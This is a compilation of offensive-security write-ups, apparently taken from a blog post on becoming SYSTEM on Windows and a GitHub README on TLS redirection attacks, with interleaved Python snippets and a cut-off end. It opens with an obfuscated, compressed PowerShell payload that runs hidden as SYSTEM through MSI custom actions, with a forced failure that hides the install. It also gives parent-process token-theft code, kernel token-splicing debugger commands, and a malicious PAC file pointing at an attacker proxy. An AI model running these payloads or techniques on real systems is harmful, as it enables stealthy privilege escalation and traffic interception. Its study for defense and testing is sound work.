RQBTAE4ASAA3ADYAegAyAE0AOQBqAFQAcgBHAHIAdwAvAEoAaABaAG8ATwBQAGIAMgB6AGQAdgAzADcAaQBwAE0ASwBMAHEAZQBuAGcAcQBDAGgAaQBkAFQAUQA5AGoAQQBuAGoAVgBQAGcALwBwAHcAZQA2AFQAVQBzAGcAcABYAFQAZwBWAFMAeQA1ADIATQBNADAAOABpAEkAaABvAE0AMgBVAGEANQAyAEkANgBtAHkAawBaAHUANwBnAHEANQBsADcAMwBMADYAYgBHAFkARQBxAHMAZQBjAEcAeAB1AGwAVgA0AFAAYgBVADQAZABXAGIAZwBsAG0AUQBxAHMANgA2AEkAWABxAGwAUwBpAFoAZABlAEYAMQAyAE4AdQBOAFEAbgB0AFoAMgBQAFYAOQBSAE8AZABhAFcAKwBSAEQAOQB4AEcAVABtAEUAbQBrAC8ATgBlAG8AQgBOAHoAUwBZAEwAeABLAGsAUgBSAGoAdwBzAFkAegBKAHoAeQB2AFIAbgB0AC8AcQBLAHkAbQBkAGYASQA2AEwATQBJAFEATABaAGsATQBJAFEAVQBFAEYAMgB0AFIALwBCAEgAUABPAGoAWgB0AHQAKwBsADYAeQBBAHEAdQBNADgAQwAyAGwAdwBRAGMAMABrAHQAVQA0AFUAdgBFAHQAUABqACsAZABnAGwASwAwAHkASABJAFkANQBwAFIAOQBCAE8AZABrADUAeABTAFMAWQBFAFMAZQBuAEkARAArAGsAeQBSAEsASwBKAEQAOABNAHMAOQAvAGgAZABpAE0AbQBxAFkAMQBEAG0AVwA0ADMAMAAwADYAbwBUAEkANgBzAGMAagArAFUASQByAEkAaABnAFIARAArAGcAeABrAFEAbQAyAEkAVwBzADUARgBUAFcAdABRAGgAeABzADYAawBYAG4AcAAwADkAawBVAHUAcQBwAGcAeAA2AG4AdQB3ADAAeABwAHkAQQBXADkAaQBEAGsAdwBaAHkAMABJAEEAeQBvAE0ARQB0AEwAeABKAFoASABzAFYATQBMAEkAQwBtADAATgBwAE4AeABqADIAbwBKAEMAVABVAGoAagBvAEMASAB2AEUAeQBiADQAQQBNAGwAWAA2AFUAZABZAHgASQB5AGsAVgBKAHgAQQBoAHoAUwBiAGoATQBxAGQAWQBWAEUAaQA0AEoARwBKADIAVQAwAG4AOQBIAG8AcQBUAEsAeQBMAEYAVQB4AFUAawB5AFkAdQBhAFYAcwAzAFUAMgBNAGwAWQA2ADUAbgA5ADMAcgBEADIAcwBVAEkAVABpAGcANgBFAEMAQQBsAGsATgBBAFIAZgBHAFQAZwBrAEgAOABxAG0ARgBFAEMAVgArAGsANgAvAG8AMQBVAEUAegA2AFQAdABzADYANQB0AEwARwBrAFIAYgBXAGkAeAAzAFkAWAAvAEkAYgAxAG8AOAAxAHIARgB1AGIAMQBaAHQASABSAFIAMgA4ADUAZAAxAEEANwBiADMAVgBhAC8ATgBtAGkAMQB5AHUAcwBiADAAeQBwAEwAcwA5ADYAVwB0AC8AMgAyADcATgBiAEgAaQA0AFcASgBXAHYAZgBEAGkAWAB4AHMAbwA5AFkARABMAFMAdwBuADUAWAAxAHcAUQAvAGQAbQBCAHoAbQBUAHIAZgA1AGgAYgArAHcAMwBCAFcATwA3AFgAMwBpAE8ATwA2AG0ANQByAGwAZAB4AHoAZgB2AGkAWgBZAE4AMgBSAHQAVwBCAFUAUwBqAGgAVABxADAAZQBkAFUAYgBHAHgAaQBpAFUAdwB6AHIAZAB0AEEAWgAwAE8ARgBqAGUATgBPAFQAVAB4AEcASgA0ADYATwByAGUAdQBIAGkARgA2AGIAWQBqAEYAbABhAFIAZAAvAGQAdABoAEoAcgB6AEMAMwB0AC8ANAAxAHIATgBlAGQAZgBaAFQAVgByADYAMQBhAGkAOABSAEgA
VwBFAHEAbgA3AGQAYQBoAGoAOABkAG0ASQBJADEATgBjAHQANwBBAFgAYwAzAFUAQwBRAEkANgArAEsAagBJAFoATgB5AGUATgBnADIARABBAEcAZwA0AGEAQgBoAHMAMwBGAGwAOQBxAFYANwBvAEgAdgBHAE0AKwBOAGsAVgBXAGkAagA4AEgANABmAGcANwB6AEIAawBDADQAMQBRAHYAbAB0AGsAUAAyAGYARABJAEEALwB5AFoASAAyAEwAcwBIAEcANgA5AGEAcwB1AGMAdQAyAE4AVABlAEkAKwBOADkAagA0AGMAbAB2AEQAUQA0AE0AcwBDAG0AOABmAGcARgBjAEUAMgBDAFIAcAAvAEIAKwBzAE8AdwB4AEoASABGAGUAbQBPAE0ATwBvACsANwBoAHEANABYAEoALwAwAHkAYQBoAFgAbwBxAE8AbQBoAGUARQB2AHMARwBRAE8ATQB3AG4AVgB0AFgAOQBPAEwAbABzAE8AZAAwAFcAVgB2ADQAdQByAFcAbQBGAFgAMABXAHYAVQBoAHMARgAxAGQAMQB6AGUAdAAyAHEAMwA5AFcATgB4ACsAdgBLAHQAOAA3AEkAeQBvAHQAZQBKAG8AcQBPAHYAVwB1ADEAZwBiAEkASQA0AE0ARwBlAC8ARwBuAGMAdQBUAGoATAA5ADIAcgBYAGUAeABDAE8AZQBZAGcAUgBMAGcAcgBrADYAcgBzAGMARgBGAEkANwBsAHcAKwA1AHoARwBIAHEAcgA2ADMASgBHAFgAUgBQAGkARQBRAGYAdQBDAEIAcABjAEsARwBqAEgARwA3AGIAZwBMAEgASwA1AG4ANgBFAEQASAB2AGoAQwBEAG8AaAB6AEMAOABLAEwAMAA0AGsAaABUAG4AZwAyADEANwA1ADAAaABmAFgAVgA5AC8AUQBoAEkAbwBUAHcATwA0AHMAMQAzAGkATwAvAEoAZQBhADYAdwB2AFMAZwBVADQARwBvAHYAYgBNAHMARgBDAFAAYgBYAHcANgB2AHkAWQBLAGMAZQA5ADgAcgBGAHYAUwBHAGgANgBIAGwALwBkAHQAaABmAGkAOABzAG0ARQB4AG4ARwAvADAAOQBkAFUAcQA5AHoAKwBIAEgAKwBqAGIAcgB2ADcALwA1AGgAOQBaAGYAbwBMAE8AVABTAHcASAA5AGEAKwBQAEgARgBmAHkATAAzAHQAdwBnAFkAWQBTAHIAQgAyAG8AUgBiAGgANQBGAGoARgAzAHkAWgBoADAAUQB0AEoAeAA4AFAAawBDAEIAUQBnAHAAcwA4ADgAVABmAGMAWABTAFQAUABlAC8AQgBKADgAVABmAEIATwBiAEwANgBRAGcAbwBBAEEAQQA9AD0AJwAnACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEA
dABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
invalid vbs to fail install
</CustomAction>
<InstallExecuteSequence>
<Custom Action="SystemShell" After="InstallInitialize"></Custom>
<Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>

A lot of this is just boilerplate to generate an MSI; the parts to note are our custom actions:

    <Property Id="cmdline">powershell...</Property>
    <CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>

This custom action is responsible for executing our provided cmdline as SYSTEM (note the Property tag, which is a nice way to get around the length limitation of the ExeCommand attribute for long PowerShell commands).

Another useful trick is to ensure that the install fails after our command is executed, which stops the installer from adding a new entry to "Add or Remove Programs". This is done here by executing invalid VBScript:

    <CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
    invalid vbs to fail install
    </CustomAction>

Finally, we have our InstallExecuteSequence tag, which is responsible for executing our custom actions in order:

    <InstallExecuteSequence>
    <Custom Action="SystemShell" After="InstallInitialize"></Custom>
    <Custom Action="FailInstall" Before="InstallFiles"></Custom>
    </InstallExecuteSequence>

So, when executed:

1. Our first custom action will be launched, forcing our payload to run as the SYSTEM account.
2. Our second custom action will be launched, causing some invalid VBScript to be executed and stopping the install process with an error.

To compile this into an MSI we save the above contents as a file called "msigen.wix", and use the following commands:

    candle.exe msigen.wix
    torch.exe msigen.wixobj

Finally, executing the MSI file runs our payload as SYSTEM.

PROC_THREAD_ATTRIBUTE_PARENT_PROCESS method

This method of becoming SYSTEM was actually revealed to me via James Forshaw's walkthrough of how to become "Trusted Installer". Again, if you listen to my ramblings on Twitter, I mentioned this technique a few weeks back.

This technique works by leveraging the CreateProcess Win32 API call and its support for assigning the parent of a newly spawned process via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute. If we review the documentation of this setting, we see that the attributes inherited from the specified parent process include the process token.

So, this means that if we set the parent process of our newly spawned process, we will inherit the process token. This gives us a cool way to grab the SYSTEM account via the process token.
We can create a new process and set the parent with the following code:

    int pid;
    HANDLE pHandle = NULL;
    STARTUPINFOEXA si;
    PROCESS_INFORMATION pi;
    SIZE_T size;
    BOOL ret;

    // Set the PID to a SYSTEM process PID
    pid = 555;

    // Helper from the original source (not shown here)
    EnableDebugPriv();

    // Open the process which we will inherit the handle from
    if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == 0) {
        printf("Error opening PID %d\n", pid);
        return 2;
    }

    // Create our PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.
    // The first call only reports the required buffer size in `size`.
    ZeroMemory(&si, sizeof(STARTUPINFOEXA));
    InitializeProcThreadAttributeList(NULL, 1, 0, &size);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
        GetProcessHeap(),
        0,
        size
    );
    InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &pHandle, sizeof(HANDLE), NULL, NULL);
    si.StartupInfo.cb = sizeof(STARTUPINFOEXA);

    // Finally, create the process
    ret = CreateProcessA(
        "C:\\Windows\\system32\\cmd.exe",
        NULL,
        NULL,
        NULL,
        true,
        EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        reinterpret_cast<LPSTARTUPINFOA>(&si),
        &pi
    );

    if (ret == false) {
        // GetLastError() returns a DWORD, so print it as unsigned long
        printf("Error creating new process (%lu)\n", GetLastError());
        return 3;
    }

When compiled, we see that we can launch a process and inherit an access token from a parent process running as SYSTEM, such as lsass.exe. The source for this technique can be found here.

Alternatively, NtObjectManager provides a nice easy way to achieve this using PowerShell:

    New-Win32Process cmd.exe -CreationFlags Newconsole -ParentProcess (Get-NtProcess -Name lsass.exe)

Bonus Round: Getting SYSTEM via the Kernel

OK, so this technique is just a bit of fun, and not something that you are likely to come across in an engagement... but it goes some way to show just how Windows is actually managing process tokens.

Often you will see Windows kernel privilege escalation exploits tamper with a process structure in the kernel address space, with the aim of updating a process token.
For example, in the popular MS15-010 privilege escalation exploit (found on exploit-db here), we can see a number of references to manipulating access tokens.

For this analysis, we will be using WinDBG on a Windows 7 x64 virtual machine, in which we will be looking to elevate the privileges of our cmd.exe process to SYSTEM by manipulating kernel structures. (I won't go through how to set up the kernel debugger connection, as this is covered in multiple places for multiple hypervisors.)

Once you have WinDBG connected, we first need to gather information on the running process which we want to elevate to SYSTEM. This can be done using the !process command:

    !process 0 0 cmd.exe

The output shows some important information about our process, such as the number of open handles and the process environment block address:

    PROCESS fffffa8002edd580
        SessionId: 1  Cid: 0858    Peb: 7fffffd4000  ParentCid: 0578
        DirBase: 09d37000  ObjectTable: fffff8a0012b8ca0  HandleCount:  21.
        Image: cmd.exe

For our purpose, we are interested in the provided PROCESS address (in this example fffffa8002edd580), which is actually a pointer to an EPROCESS structure. The EPROCESS structure (documented by Microsoft here) holds important information about a process, such as the process ID and references to the process threads.

Amongst the many fields in this structure is a pointer to the process's access token, defined in a TOKEN structure. To view the contents of the token, we first must calculate the TOKEN address. On Windows 7 x64, the process TOKEN pointer is located at offset 0x208, an offset that differs between versions (and potentially service packs) of Windows. We can retrieve the pointer with the following command:

    kd> dq fffffa8002edd580+0x208 L1

This returns the token address as follows:

    fffffa80`02edd788  fffff8a0`00d76c51

As the token address is referenced within an EX_FAST_REF structure, we must AND the value to gain the true pointer address:

    kd> ? fffff8a0`00d76c51 & ffffffff`fffffff0
    Evaluate expression: -8108884136880 = fffff8a0`00d76c50

This means that our true TOKEN address for cmd.exe is fffff8a000d76c50. Next we can dump out the TOKEN structure members for our process using the following command:

    kd> !token fffff8a0`00d76c50

This gives us an idea of the information held by the process token:

    User: S-1-5-21-3262056927-4167910718-262487826-1001
    User Groups:
     00 S-1-5-21-3262056927-4167910718-262487826-513
        Attributes - Mandatory Default Enabled
     01 S-1-1-0
        Attributes - Mandatory Default Enabled
     02 S-1-5-32-544
        Attributes - DenyOnly
     03 S-1-5-32-545
        Attributes - Mandatory Default Enabled
     04 S-1-5-4
        Attributes - Mandatory Default Enabled
     05 S-1-2-1
        Attributes - Mandatory Default Enabled
     06 S-1-5-11
        Attributes - Mandatory Default Enabled
     07 S-1-5-15
        Attributes - Mandatory Default Enabled
     08 S-1-5-5-0-2917477
        Attributes - Mandatory Default Enabled LogonId
     09 S-1-2-0
        Attributes - Mandatory Default Enabled
     10 S-1-5-64-10
        Attributes - Mandatory Default Enabled
     11 S-1-16-8192
        Attributes - GroupIntegrity GroupIntegrityEnabled
    Primary Group: S-1-5-21-3262056927-4167910718-262487826-513
    Privs:
     19 0x000000013 SeShutdownPrivilege               Attributes -
     23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
     25 0x000000019 SeUndockPrivilege                 Attributes -
     33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
     34 0x000000022 SeTimeZonePrivilege               Attributes -

So how do we escalate our process to gain SYSTEM access? Well, we just steal the token from another SYSTEM-privileged process, such as lsass.exe, and splice it into our cmd.exe EPROCESS using the following:

    kd> !process 0 0 lsass.exe
    kd> dq <LSASS_PROCESS_ADDRESS>+0x208 L1
    kd> ? <LSASS_TOKEN_ADDRESS> & FFFFFFFF`FFFFFFF0
    kd> !process 0 0 cmd.exe
    kd> eq <CMD_EPROCESS_ADDRESS+0x208> <LSASS_TOKEN_ADDRESS>

To see what this looks like when run against a live system, I'll leave you with a quick demo showing cmd.exe being elevated from a low-level user to SYSTEM privileges.

Source: https://blog.xpnsec.com/becoming-system/
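The EX_FAST_REF masking step from the WinDBG walkthrough above can be checked with plain integer arithmetic. The following is a minimal sketch, not part of the original post: the function names are made up for illustration, and it assumes the x64 layout in which the low 4 bits of the stored value hold a reference count, which is why the walkthrough ANDs with ffffffff`fffffff0.

```python
# Sketch of the EX_FAST_REF arithmetic used in the walkthrough.
# Assumption: x64 layout, where the low 4 bits are a reference count.
EX_FAST_REF_MASK = 0xFFFFFFFFFFFFFFF0  # same mask as ffffffff`fffffff0


def fast_ref_to_pointer(value: int) -> int:
    """Clear the low 4 bits to recover the real object address."""
    return value & EX_FAST_REF_MASK


def fast_ref_refcount(value: int) -> int:
    """Return the low 4 bits that the mask throws away."""
    return value & 0xF


def as_signed64(value: int) -> int:
    """Interpret a 64-bit value as signed, the way `?` prints it in WinDBG."""
    return value - (1 << 64) if value & (1 << 63) else value


raw = 0xFFFFF8A000D76C51           # value read with `dq ...+0x208 L1`
token = fast_ref_to_pointer(raw)

print(hex(token))                  # 0xfffff8a000d76c50
print(as_signed64(token))          # -8108884136880
print(fast_ref_refcount(raw))      # 1
```

The two printed values match the `Evaluate expression` line in the debugger output: the negative decimal number is simply the same 64-bit address read as a signed integer.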

-

TLS Redirection (and Virtual Host Confusion)

The goal of this document is to raise awareness of a little-known group of attacks, TLS redirection / Virtual Host Confusion, and to bring all the information related to this topic together.

- Intro
- Terms
- Docs
- Technical details
  - Certificate/TLS features
  - Virtual host fallback
- Attacks (MitM)
  - Techniques
    - MitM + iptables redirection
    - Adversary proxy
    - Cache poisoning attack
  - Tools (?)
- Exploitation techniques
  - File uploading (SDRF)
  - XSS
  - Self-XSS
  - Flash and crossdomain.xml
  - CORS
  - Protocol smuggling (CrossProtocol XSS)
  - Active content substitution
  - JavaScript libs (and Protocol smuggling)
  - HTTP libs (and Protocol smuggling)
  - HTTPS 2 HTTP redirect
  - Reverse Proxy misrouting
  - Client Cert auth "bypass"
  - Certificate Pinning
- Protection

Intro

The main goal of TLS is to protect an encapsulated protocol from MITM attacks. To do this, TLS provides encryption, data integrity checking, and endpoint authentication. Authentication is performed via X.509 certificates, which contain a list of domain names for which the certificate is valid. As a result, a client connecting to a server can make sure that it is connected to the required server (and not to a malicious server).

However, there are various types of certificates, for example certificates with wildcard names. This means that several servers may use a shared certificate. It should also be kept in mind that TLS operates above the transport layer and knows nothing about the underlying protocols (IP, transport protocol). Thus, when a client connects to a server, the attacker can perform a MITM attack and redirect the client to another server (with a shared certificate). At the same time, the client cannot tell which specific server it is connected to.

Why "TLS redirection"?

The initial name of the attacks is Virtual Host Confusion.
Virtual Host Confusion is part of a larger issue that stems from the SSL/TLS architecture (for example, an attack can be performed not only with the HTTP protocol). So TLS redirection covers a wider range of attacks, including Virtual Host Confusion. Depending on circumstances you can use either of these terms.

What are the consequences?

It is important to note that this attack does not depend on the protocol encapsulated in TLS. It can be HTTP, SMTP, TNS, etc. However, the consequences largely depend on the protocol "capabilities", and also on how much the attacker "controls" the behavior of the server to which the redirection takes place. The most interesting results are obtained using browsers with the HTTP protocol.

Here is the simplest example, with XSS. If HostB has an XSS vulnerability and both HostA and HostB use a shared certificate, the attacker can force a user to send a request to HostA with an XSS payload for HostB, perform a MITM attack, and redirect the request to HostB. HostB will process this request (using the default virtual host) and respond with the XSS payload. However, for the user's browser, this response comes from HostA and, therefore, the JavaScript will be executed in the context of HostA.

Thus, the TLS redirection attack allows attackers to exploit bugs of vulnerable servers on hosts without vulnerabilities. It also helps exploit weaknesses that arise from the incorrect use of certain technologies/protocols, none of which is a vulnerability by itself (without the use of a TLS redirection attack). More information on the attack techniques is given below.

Terms

- Attacked Host/Server (HostA(ttacked)) is the server under attack.
- TLS-brother Host/Server (HostB(rother)) is a server with a certificate or configuration which includes the Attacked server due to TLS specifics.
- Shared (Overlapping) Certificate is a certificate that includes both the Attacked server and the TLS-brother server names.
- Same-Certificate Policy (similar to the Same Origin Policy) indicates that SSL/TLS provides the ability to authenticate the destination host only to a certain degree of accuracy due to TLS specifics.

Docs

The goal of this document is to bring all the information together (main ideas, techniques), not to explain everything in detail. So in order to fully understand the attacks, it is highly recommended to read all these white papers and presentations:

- Network-based Origin Confusion Attacks against HTTPS Virtual Hosting by Antoine Delignat-Lavaud and Karthikeyan Bhargavan
- The BEAST Wins Again: Why TLS Keeps Failing to Protect HTTP by Antoine Delignat-Lavaud
- Demos from "The BEAST Wins Again..." by Antoine Delignat-Lavaud
- MITM Attacks on HTTPS: Another Perspective (SpeakerDeck version) by @antyurin

Technical details

Certificate/TLS features

- port is ignored
- issued for multiple hosts (SAN and CN*)
- wildcard name
- TLS cache sharing**
- SSLv3 (no SNI)**
- HTTP/2 connection sharing**

\* CN: Chrome has not supported the CN field since version 58
\*\* depends on the configuration of the web server and browser

Virtual host fallback

When an HTTP request comes to the TLS-brother server instead of the Attacked server, the SNI of the TLS request and the Host header of the request itself will indicate the name of the Attacked server. If the web server does not have a virtual host with the name of the Attacked server, the response comes from the default virtual host.

Attacks (MitM)

Techniques

Here is a list of techniques to perform TLS redirection attacks.

MitM + iptables redirection

When the Attacked server and the TLS-brother server have different IPs (or ports), all connections are redirected to a host controlled by the attacker using various MITM techniques (ARP poisoning, for example). The IP address (port) is then changed to the required one using iptables (for example).
Adversary proxy

By attacking WPAD, the attacker can force a user's browser to use different proxy servers for different domain names using the PAC file. As the attacker controls the proxy server, he or she can redirect requests from the user's browser.

Before the publication of several papers in 2016, attackers could set the rules at the URL level (Chrome, FF), and not just at the domain name level, which allowed more sophisticated TLS redirection attacks, for example, redirection and substitution of only parts of pages (Active Content Substitution attack). However, the technique is still useful for attacks at the domain name level. Chrome: fixed. FF: not fixed (last checked in Jan 2017).

Example of a WPAD (PAC) file:

    function FindProxyForURL(url, host) {
        if (url == "https://HostA/crossdomain.xml") {
            alert("Req 2 HostA w/ crossdomain " + url);
            return "PROXY attacker.proxy.com:9999";
        } else if (url.indexOf('https://HostA') !== -1) {
            alert("Req 2 HostA " + url);
            return "PROXY attacker.proxy.com:8888";
        } else {
            alert("for another hosts " + url);
            return "DIRECT";
        }
    }

Cache poisoning attack

By default, most web servers add headers which allow caching of static content (JS, CSS). If the headers from the web server permit it, a browser caches responses, binding them to the full URL.

In this attack, the attacker first forces the user's browser to load a specific script from the Attacked server, but then redirects this request to the TLS-brother server using the TLS redirection attack. The server returns the script (which was originally uploaded by the attacker, for example). The user's browser caches the script. After that, the attacker forces the user to send a request to the page (on the Attacked server) from which the script should be called. The browser receives the page and parses it. However, it does not load the script again, but takes it from the cache (i.e. the attacker's script from the TLS-brother server) and executes it.

Tools (?)

- script for MitM (iptables)
- script for START TLS feature
- script for proxy-redirector

Exploitation techniques

File uploading (SDRF)

If any user-generated content (for example, HTML pages) can be uploaded to the TLS-brother server, then an attacker can execute JS code in the context of the Attacked server in the user's browser using the TLS redirection attack. Moreover, the attacker can attack auto-update services on the user's host if he or she can place a file on the TLS-brother server under the same path from which the service tries to download the file from the Attacked server.

Video: Virtual host confusion exploit against Dropbox

XSS

If the TLS-brother server has an XSS vulnerability, the attacker can force the user's browser to send a request with an XSS payload for the TLS-brother server to the Attacked server, perform a TLS redirection attack, and redirect the request to the TLS-brother server. The TLS-brother server processes this request (using the default virtual host) and responds with the XSS payload. However, for the user's browser, this response comes from the Attacked server and, therefore, the JavaScript will be executed in the context of the Attacked server.

Video: TLS Redirection / Virtual Host Confusion and XSS

Self-XSS

If the TLS-brother server has a self-XSS vulnerability (linked to a cookie), the attacker can expose his or her cookie from the TLS-brother server to the Attacked server via the cookie forcing technique. Thus, during the TLS redirection attack, the HTTP request that goes to the TLS-brother server will contain the attacker's cookies, which allows the self-XSS vulnerability to be exploited in the context of the Attacked server.

Flash and crossdomain.xml

If the TLS-brother server contains a crossdomain.xml with * (or if the attacker has access to the trusted name zone), then the attacker can place on his or her own web server a special SWF file that will interact with the Attacked server.
When the user's browser executes the SWF file, the user's Flash sends a request for the crossdomain.xml file, which is redirected to the TLS-brother server using the TLS redirection attack. Flash sees the permission for interaction (* is in the file) and caches it, thus allowing subsequent interaction with the Attacked server.

CORS

If the TLS-brother server returns CORS headers, then, in case of a successful TLS redirection attack, the attacker can send only one request to the Attacked server (with modified headers/method, depending on the CORS permissions) and cannot read the response from the Attacked server. This is because the CORS headers are checked for each response and, in case of failure, the browser resets the CORS cache. Thus, a successful attack is possible only if the attacker is able to change certain headers that are critical to the Attacked server.

Protocol smuggling (CrossProtocol XSS)

There are many text-based (and not only text-based) protocols. Many of them allow "interaction" from the HTTP protocol, and some return all (or part) of the sent HTTP request back. In this case, browsers parse the responses from such services, since they treat them as HTTP/0.9 (i.e. the body of the response without headers).

If the TLS-brother server has a service that "reflects" the request back, then it can be used in an attack. If a user uses the IE browser, the attacker can force the user to send a special request with a JS payload (XSS) to the Attacked server, but then, using the TLS redirection attack, redirect the user to the service on the TLS-brother server. The service will "reflect" the request, and given that the attacker can force the browser to parse the response as HTML (content sniffing), the attacker can execute JS code in the context of the Attacked server.

In the case of other browsers, the response is parsed as text/plain, which does not allow an XSS attack. Nevertheless, the technique itself still works.
For example, if there is already an XSS on the Attacked server, it is possible to steal cookies (and other headers) using this technique, even if they are protected by the httpOnly flag.

Video: TLS Redirection / Virtual Host Confusion and CrossProtocol XSS

The following tables show the behavior of various applications: whether they return requests and whether they break connections after a large number of errors. The results are not fully conclusive, since the tests were conducted on random hosts on the Internet.

SMTP

| Software | Content reflection | No disconnect on errors |
|---|---|---|
| Exim | - | - |
| Postfix | - | + |
| SendMail | + | + |
| QMail | - | + |
| MS Exchange | - (?) | - (?) |
| IBM Lotus Domino | + | + |
| Sun ONE Messaging Server (SendMail?) | + | + |
| IdeaSmtpServer | + (till space) | + |

POP3

| Software | Content reflection | No disconnect on errors |
|---|---|---|
| Dovecot | - | - |
| QMail | - | - |
| MS Exchange | - | - |
| MailEnable POP3 Server | - | - (?) |
| IBM Lotus Domino | + (till space) | + |
| MDaemon | - | - |
| WinGate | + (till space) | + |
| Kerio Connect | - | + |
| Cyrus | - | + |
| Qpopper | + (till space) | + |

IMAP

| Software | Content reflection | No disconnect on errors |
|---|---|---|
| Dovecot | - | - |
| IMail | + | + |
| UW imapd | + (till 2nd space) | + |
| MS Exchange | - (?) | - |
| IBM Lotus Domino | + (till space) | + |
| MDaemon | + (till space) | + |
| Kerio Connect | + (till 2nd space) | + |
| Qpopper | + (till 2nd space) | + |
| Cyrus | + (till space) | + |

Active content substitution

Usually a page consists of HTML (with pictures) and active content, like JS, CSS, and plugin objects, which can be embedded in the page or located in separate files. In this attack, TLS redirection is used to redirect only the requests for the active content. That means the user's browser receives the HTML code from the Attacked server and, for example, a JS script from the TLS-brother server. Of course, to perform the attack, the attacker must be able to control the content of the JS script on the TLS-brother server.

To circumvent some of the limitations of this attack, you can use Relative Path Overwrite or similar techniques.
It is worth mentioning some facts about browser behavior that make this attack more reliable, namely whether browsers execute a file loaded from a script element (<script src="lib.js"></script>) depending on its headers:

- no browser cares about the Content-Disposition header
- IE doesn't care about the Content-Type header (without nosniff)
- FF, Chrome and Edge refuse to execute a script only if its Content-Type is from the "image" family (without nosniff)
- with X-Content-Type-Options, all browsers require a correct Content-Type

A WPAD attack or Cache poisoning attack might be useful here.

Video: TLS Redirection / Virtual Host Confusion and Active content substitution

JavaScript libs (and Protocol smuggling)

Nowadays web applications are full of JS libs. Modern approaches to development imply that JS frameworks fetch content from the web server silently and asynchronously and display it to the user (AJAX, Single Page Applications, and so on). If the JavaScript of a web application on the Attacked server uses "insecure" functions, we can perform the TLS redirection attack.

For example, there is a TLS-brother server with a "reflection" service and an Attacked server that uses the jQuery load function to get content from the Attacked server. The load function fetches content from a server and inserts it into the appropriate element, so scripts in the content are executed.

An attacker uses the cookie forcing technique and sets an additional cookie in the user's browser for the Attacked server. The cookie contains an XSS payload. The attacker forces the user's browser to open the Attacked server. Once the whole page has been loaded, the attacker turns on the TLS redirection attack. The jQuery code from the Attacked server tries to get some content using the load function; this request is redirected to the TLS-brother server. The service "reflects" the request back, and again the user's browser treats it as an HTTP/0.9 response. As jQuery doesn't care about Content-Type, the payload from the cookie will be executed.
Similar attacks can be performed if an attacker controls the content of files on the TLS-brother server.

Potentially vulnerable features:

- jQuery's load
- jQuery's get, post, ajax (old versions, with specific Content-Types)
- HTML import (test is required)

A WPAD attack or Cache poisoning attack might be useful here.

HTTP libs (and Protocol smuggling)

In some cases an attacker can perform TLS redirection between servers (APIs, for example) and influence business logic. For example, if the victim checks authentication using Curl (looking for 200 OK) against the Attacked server's REST API, the Protocol smuggling (CrossProtocol XSS) technique could be used, because Curl supports the HTTP/0.9 protocol and returns "CURLE_OK". Similar attacks can be performed if an attacker controls the responses from the TLS-brother server.

HTTPS 2 HTTP redirect

If the TLS-brother server redirects the request to the HTTP protocol, then it is possible to capture and steal some information from it (a token, for example) after it is redirected.

Video: Virtual host confusion exploit against Pinterest

Reverse Proxy misrouting

This is the case when the TLS-brother is a reverse proxy and the attacker can control the routing of HTTP requests on the reverse proxy.

Video: Virtual host confusion exploit against Akamai

Client Cert auth "bypass"

If a system uses client authentication with a TLS certificate, then, in case of a TLS redirection attack, the client will not send its client certificate, because the TLS-brother server will not request it.

Certificate Pinning

Certificate pinning allows you to bind a server name to a specific certificate, but if both the TLS-brother and the Attacked server use the same certificate, the attacker can still perform a TLS redirection attack and, possibly, affect the behavior of the client.

Protection

- At the TLS protocol level, an Alert is returned from the server if the SNI from the TLS request does not match the value from the certificate on the server. Java halts the TLS connection with an error, browsers don't.
- The default virtual host value can be set blank at the web server level.
- Group resources (shared certificate) by the level of security.
- Locate web servers with user content in a separate domain (not in a subdomain) and with a separate certificate.
- Hardening (like HSTS, SRI, content-sniffing protection, etc.) can prevent or limit some types of attacks.

Source: https://github.com/GrrrDog/TLS-Redirection#tls-redirection-and-virtual-host-confusion
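As a rough illustration of the "Protection" advice above (no default virtual host fallback), here is a minimal sketch of the decision a server-side component could make before routing a request. It is not taken from the README: the function names, the `SERVED_HOSTS` set and the example host names are all hypothetical, and a real deployment would express the same rule in the web server's own configuration.

```python
from typing import Optional

# Hypothetical: the only names this server is actually meant to serve.
SERVED_HOSTS = frozenset({"hostb.example.com"})


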